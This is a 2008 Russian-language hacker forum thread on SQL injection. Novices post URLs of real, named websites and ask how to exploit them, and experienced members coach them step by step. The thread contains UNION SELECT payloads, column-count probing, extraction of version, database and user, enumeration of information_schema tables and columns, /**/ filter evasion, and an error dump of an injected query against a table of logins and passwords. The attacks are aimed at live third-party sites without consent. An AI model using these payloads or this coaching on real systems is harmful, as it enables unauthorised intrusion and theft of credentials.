RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-24 19:16:19.113333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
ORIGINAL: horiz
2) Если хочешь стать хакером, то обязательно учи теорию, без нее никак. Что ты знаешь на сегодняшний день?
я конечно извиняюсь, но может вы в аську пройдете или PM? Тут как бы все читают. Наверное таки лучше общаться по делу
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-24 19:20:49.070000
|
|
|
alex7474
Сообщений: 54
Оценки: 0
Присоединился: 2008-09-11 11:29:55.193333
|
да, ты прав! мне еще надо многое учить и дергаться на какие нить забытые сайты =) кому надо пусть копают, кстати вот что вывел на последний запрос :
[warning : 173 : select execution error 'ERROR: syntax error at or near "(" LINE 1: ...,1212,'3','4','5',database(),'7','8','9','10',user(),'12',ve... ^' in command 'SET_FROM_SELECT:$THIS.type|$THIS.companyid|$THIS.status|$THIS.login|$THIS.password|$THIS.name|$THIS.phone|$THIS.fax|$THIS.email|$THIS.department|$THIS.faceposition|$THIS.blocked|$THIS.companytitle|$THIS.antispam:EXPORT_DATA = F.type,F.companyid,F.status,F.login,F.password,F.name,F.phone,F.fax,F.email,F.department,F.faceposition,F.blocked,C.title,C.antispam;FROM = face AS F,company AS C;F.id = $THIS.faceid AND C.id = F.companyid', select string : 'SELECT F.type,F.companyid,F.status,F.login,F.password,F.name,F.phone,F.fax,F.email,F.department,F.faceposition,F.blocked,C.title,C.antispam FROM face AS F,company AS C WHERE (F.id = -30234) UNION SELECT 1,1212,'3','4','5',database(),'7','8','9','10',user(),'12',version(),TRUE-- AND C.id = F.companyid)'] [warning : variable $companyid does not exist in command 'SET_FROM_SELECT:$THIS.mainfaceid:EXPORT_DATA = id;FROM = face;ORDER_BY = type DESC;LIMIT = 1;companyid = $THIS.companyid AND type IN (1,2)']
[/code]
скобку невспринемает =\ ладно биг спс за активную помощь! никогда не видел такого интузиазма со стороны форумцев! [:)] респект те !
ушел листать mysql...
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-24 19:22:27.943333
|
|
|
Fuck_Them_All
Сообщений: 25
Оценки: 0
Присоединился: 2008-11-24 17:46:05.890000
|
HORIZ
Моя аська 372023465
Постучите пожалуйста
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-24 19:23:38.820000
|
|
|
Fuck_Them_All
Сообщений: 25
Оценки: 0
Присоединился: 2008-11-24 17:46:05.890000
|
Тоесть Pashkela вот моя аська 372023465
Извините за неряшливость!
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-24 19:26:18.196666
|
|
|
Fuck_Them_All
Сообщений: 25
Оценки: 0
Присоединился: 2008-11-24 17:46:05.890000
|
Эх…….и я тож….свалил Листать Mysql
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-24 19:27:39.400000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
2 Fuck_Them_All:
неа:) На каждую прогу, что я тебе дал, есть свой RTFM. Не надо совсем уж халявить. Децл таки придется поднапрячься. По второму варианту подробнейший readme есть, по SIPT4 -
http://dbattack.com/forum/viewforum.php?f=3
официальный сайт создателя
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-24 19:34:49.636666
|
|
|
Fuck_Them_All
Сообщений: 25
Оценки: 0
Присоединился: 2008-11-24 17:46:05.890000
|
Pashkela
Причём тут халявить)))Я во всём разобрался…….говорю СПАСИБО!!!))))…….:D
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-24 19:38:41.730000
|
|
|
Fuck_Them_All
Сообщений: 25
Оценки: 0
Присоединился: 2008-11-24 17:46:05.890000
|
Всем удачи и хорошего коннекта)))Я сваливаю на 2 месяца в Los Angeles!!!!!))))):):):)
Хех)) Pashkela Спасибо за помощь!!!!!
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-25 15:37:31.543333
|
|
|
KwisatZZ HaderaHH
Сообщений: 17
Оценки: 0
Присоединился: 2008-10-29 00:08:36.796666
|
Подскажите пожалуйста. В одном факе видел запись запроса в таком виде: [link=http://xxx/news.php?id=-1']xxx/news.php?id=-1' union select 1,2,3 –
В другом аналогичный запрос вроде бы выглядит так: [link=http://xxx/news.php?id=-1'+union+select+1,2,3+/]xxx/news.php?id=-1'+union+select+1,2,3+/*
Ну допустим в разных версиях Мускуля разный набор символов определяющих начало коммента. Но почему в одном запросе пишем "…+union+select+…", а в другом просто "union select"?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-25 16:18:04.840000
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
нет , в одном случае фильтруются знаки пробела, в другом нет. ещё + пишут из эстетического понимания, мне так легче читается
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-25 22:00:23.920000
|
|
|
KwisatZZ HaderaHH
Сообщений: 17
Оценки: 0
Присоединился: 2008-10-29 00:08:36.796666
|
quote:
ORIGINAL: brtn
нет , в одном случае фильтруются знаки пробела, в другом нет. ещё + пишут из эстетического понимания, мне так легче читается
Значит на всякий случай можно всегда писать без пробелов и с плюсами? По крайней мере мне, как начинающему, сложно определить фильтруется пробел или нет.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-25 22:33:51.746666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Всегда вместо пробелов и плюсов ставь /**/
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-25 22:40:40.546666
|
|
|
KwisatZZ HaderaHH
Сообщений: 17
Оценки: 0
Присоединился: 2008-10-29 00:08:36.796666
|
Спасибо. Не понял правда почему, но буду разбираться :-)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-25 23:39:51.613333
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
quote:
ORIGINAL: KwisatZZ HaderaHH
Спасибо. Не понял правда почему, но буду разбираться :-)
потому что для мускула это знаки закрытого комментария, т.е. /* открывает комментарий, а */ закрывает, что также идентично пробелу.
quote:
Всегда вместо пробелов и плюсов ставь /**/
а чем плюсы не угодили? если не фильтруются то с ними удобнее - один символ вместо 4-ёх =)
ап
quote:
чем хуже плюсы я не знаю.
они фильтруются бывает, бывает нет
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-25 23:48:03.946666
|
|
|
KwisatZZ HaderaHH
Сообщений: 17
Оценки: 0
Присоединился: 2008-10-29 00:08:36.796666
|
я не знал что комментарий идентичен пробелу. а то что это /**/ пустой коммент это понятно. чем хуже плюсы я не знаю. человек подсказал я и хотел узнать почему. искал в гугле но пока не нашёл
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-26 10:03:50.933333
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
Так. Давайте все расставим по полкам.
+ используется как аналог пробела в строке запроса (т.е. вместо %20 для более короткой и прозрачной записи).
Попадая на сервер, он сразу преобразуется в пробел. Так что против фильтраций он не поможет (если только фильтрации не подвергается $_SERVER[QUERY_STRING]).
И если вы в консоли мускула введете
SELECT+user+FROM+mysql.user;
он пошлет вас подальше.
А вот многострочные комментарии /**/ уже по правилам мускула считается как пробел.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-26 20:00:57.406666
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
http://kengu.ru/news.php?get=4172' вот нашел, помогите то нить сделать с ссылкой :)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-26 20:47:55.426666
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
quote:
http://kengu.ru/news.php?get=4172' вот нашел, помогите то нить сделать с ссылкой :)
Почитай этот топик.
Таких вопросов уже сотни задавали и на них давали развернутые ответы.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-26 21:00:25.260000
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
не нашел нужного не понял я :( помогите (((
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-26 21:12:16.920000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
1) Проверяем:
?get=4172
?get=4173-1
Если вернулось одно и то же, значит здесь дыра.
2)
?get=-1+UNION+SELECT+1–
?get=-1+UNION+SELECT+1,2–
?get=-1+UNION+SELECT+1,2,3–
И т.д. пока не перестанет появляться ошибка.
Дальше смотришь, где на странице появились цифры из твоего запроса.
В запросе вместо появившихся цифр ставь
version()
database()
user()
и смотри, что покажет.
Проделай все и напиши.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-26 22:38:23.983333
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
а потом что мона сделать с ним?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-27 10:25:09.746666
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
quote:
а потом что мона сделать с ним?
Все зависит от конкретных обстоятельств. Сделай то, что я написал и напиши, что получилось.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-27 13:02:43.163333
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
http://kengu.ru/news.php??get=-1+UNION+SELECT+1,2,3– вот тут нет ошибки просто я не знаю как мона сделать
Дальше смотришь, где на странице появились цифры из твоего запроса.
В запросе вместо появившихся цифр ставь
version()
database()
user()
и смотри, что покажет.
Проделай все и напиши.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-27 13:17:28.280000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
"http://kengu.ru/news.php??get=-1+UNION+SELECT+1,2,3–"
ошибки в таком случае не будет никогда, хоть удали вообще "+UNION+SELECT+1,2,3–" или поставь любое кол-во колонок - надо сначала найти страницу, которая выдает ошибки, и это не должен быть xml
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-27 18:17:32.503333
|
|
|
KwisatZZ HaderaHH
Сообщений: 17
Оценки: 0
Присоединился: 2008-10-29 00:08:36.796666
|
quote:
ORIGINAL: Isusik
http://kengu.ru/news.php??get=-1+UNION+SELECT+1,2,3– вот тут нет ошибки просто я не знаю как мона сделать
а я пробовал вручную и через SIPT 4.0 получилось что там всего одно поле, а не 3…[:-]
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-27 18:34:23.026666
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
И что можно с этим сделать??
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-27 18:44:45.310000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Ничего, читай на два поста выше
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-27 18:51:40.913333
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
quote:
"http://kengu.ru/news.php??get=-1+UNION+SELECT+1,2,3–"
ошибки в таком случае не будет никогда, хоть удали вообще "+UNION+SELECT+1,2,3–" или поставь любое кол-во колонок - надо сначала найти страницу, которая выдает ошибки, и это не должен быть xml
Что ты имел в виду? То, что в запросе лишний знак вопроса, то что есть подавление ошибок, или это файл не php а xml?
Он же прислал запрос вида:
quote:
http://kengu.ru/news.php?get=4172' вот нашел, помогите то нить сделать с ссылкой :)
т.е. подразумевается, что в ответ на кавычку вышла ошибка.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-27 18:55:33.190000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Я и имел в виду, что прежде чем постить, проверяй, что хоть постишь. То, что пишите вы - полный бред. Пока вы там не нашли никакой SQL-inject
А если и нашли, то не можете понять, как её использовать
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-27 19:03:55.580000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
Просто когда в этот раздел пишу что-то вроде:
quote:
http://kengu.ru/news.php?get=4172' вот нашел, помогите то нить сделать с ссылкой :)
подразумевается, что в ответ пришла ошибка, характерная для инъекции. Поэтому я и стал объяснять, как раскрутить инъекцию.
quote:
Я и имел в виду, что прежде чем постить, проверяй, что хоть постишь.
Я сам ковырять линк не стал по техническим причинам своей галимой линии.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-27 19:05:14.783333
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
Ппц жалб просто gbpltw :(((
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-11-28 20:17:34.193333
|
|
|
ydzero
Сообщений: 100
Оценки: 0
Присоединился: 2008-11-06 15:38:02.560000
|
Приветствую великих и ужасных)
Собственно прошу помочь найти адресок с данными, не знаю по теме или нет.
Итак, известный Torrents.ru. Мне нужна строка, в которую можно вбить данные (логин, пароль), обходя тем самым форму.
Порывшись в гугле нашел только вот такую строчку
http://torrents.ru/forum/login.php?login_username=kpn3m0&login_password=123456&autologin=0&redirect=viewforum.php&f=7
пользователя, естественно, уже не существует)
Пробовал различные комбинации, добрел до такой
http://torrents.ru/forum/login.php?login_username=USER&login_password=PASSWORD&autologin=0&redirect=viewforum.php&t=1
где USER и PASSWORD брал своего акк.
Не проходит ни в какую.
Попутный вопрос, поле redirect=viewforum.php&* под звездочкой могут быть разные ключи, на что влияют ключи, можно ли где посмотреть полный список и описание?
В общем, прошу помочь, если нужно поставлю ++
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-12-01 10:19:15.936666
|
|
|
Pavlon
Сообщений: 11
Оценки: 0
Присоединился: 2008-10-28 15:18:04.506666
|
Нужна Ваша помощь.. подскажите что не так..
Имена таблиц вытащил запросом -
?id=51+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+limit+1,1–
Нашел нужную мне таблицу допустим - admin. Хочу посмотреть её поля составляю такой запрос -
?id=51+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+where+table_name='admin'+limit+1,1–
(кавычки вроде не фильтруются) на что получаю такую ошибку-
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/gtacom/domains/xxx.xxx.xx/public_html/file_sa_details.phtml on line 11
Версия мускула - 5.0.51
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-12-01 10:55:53.623333
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
quote:
?id=51+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+where+table_name='admin'+limit+1,1–
Ты пытаешься вытащить имена столбцов из таблицы имен таблиц. - information_schema.tables
Надо из information_schema.columns.
И еще не забывай, что отсчет лимита идет от нуля.
А в общем то ошибка хорошая.
И последнее. В условии ставь не только имя таблицы, но и имя базы. На сервере может быть несколько баз с таблицами admin.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-12-02 19:31:16.370000
|
|
|
aus
Сообщений: 32
Оценки: 0
Присоединился: 2008-06-01 22:44:12.263333
|
Ребята помогите плыз с инекцией! Как подобрать имена столбцов и полей?
http://www.it-dominanta.ru/vac_details.asp?ID=485+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+news
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-12-02 19:59:37.990000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
А что за БД, какая версия?
Выводимые поля есть?
Напиши как можно больше инфы.
quote:
Как подобрать имена столбцов и полей?
А это не одно и то же?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-12-03 00:46:21.676666
|
|
|
aus
Сообщений: 32
Оценки: 0
Присоединился: 2008-06-01 22:44:12.263333
|
Вроде не одно и то же… :)
В том то и проблема что версию узнать не получаецо! Выводимые поля есть, и много! Перейди по ссылке и посмотри результат.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-12-03 01:11:55.403333
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
Уважаеме там мс акссес,а не майй скл
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-12-03 01:19:51.846666
|
|
|
aus
Сообщений: 32
Оценки: 0
Присоединился: 2008-06-01 22:44:12.263333
|
А разве из аксеса нельзя вытащить нужные данные!?
Если можно, то как?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2008-12-03 01:29:03.740000
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
брути нужную таблицу и колумны….
В мс аккесс есть системные таблицы с названием таблиц но в твоём случае нет привилегий(это в большинстве)
|
|
|
|
|
|
